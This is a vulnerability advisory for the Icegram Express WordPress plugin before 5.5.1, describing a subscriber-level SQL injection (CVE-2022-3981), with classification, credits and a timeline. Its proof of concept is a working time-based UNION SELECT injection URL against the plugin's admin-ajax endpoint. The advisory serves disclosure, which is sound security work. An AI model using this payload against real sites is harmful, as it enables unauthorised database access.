WordPress Plugin Vulnerabilities

Icegram Express < 5.5.1 - Subscriber+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

Open the below URL when logged in as a subscriber and notice the 5s delay

https://example.com/wp-admin/admin-ajax.php?action=count_contacts_by_list&get_count=yes&list_id=1&conditions[]=3&status[]=\&status[]=)%20%20UNION%20SELECT%20sleep(5)%20UNION%20SELECT%20COUNT(DISTINCT%20subscribers.id)%20FROM%20wp_ig_contacts%20AS%20subscribers%20LEFT%20JOIN%20wp_ig_lists_contacts%20AS%20lists_subscribers%20ON%20subscribers.id%20=%20lists_subscribers.contact_id%20WHERE%201=1%20AND%20lists_subscribers.status%20IN(1)%20--%20g

Affects Plugins

Plugin icon
email-subscribers
Fixed in 5.5.1

References

CVE
CVE-2022-3981

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Krzysztof Zajac
Submitter
Krzysztof Zajac
Submitter website
https://kazet.cc/
Submitter twitter
https://twitter.com/kazet1234
Verified
Yes
WPVDB ID
78054d08-0227-426c-903d-d146e0919028

Timeline

Publicly Published
2022-11-21 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-12-01 (about 1 years ago)

Other

Published
Title
Published
2022-04-05
Title
Documentor <= 1.5.3 - Unauthenticated SQLi
Published
2019-07-22
Title
Email Subscribers & Newsletters < 4.1.8 - SQL Injection
Published
2021-09-16
Title
Buddyboss Platform < 1.7.9 - Subscriber+ SQL Injection
Published
2014-08-01
Title
WordPress 2.1.2 - Authenticated XML-RPC SQL Injection
Published
2023-10-27
Title
Article Analytics <= 1.0 - Unauthenticated SQL injection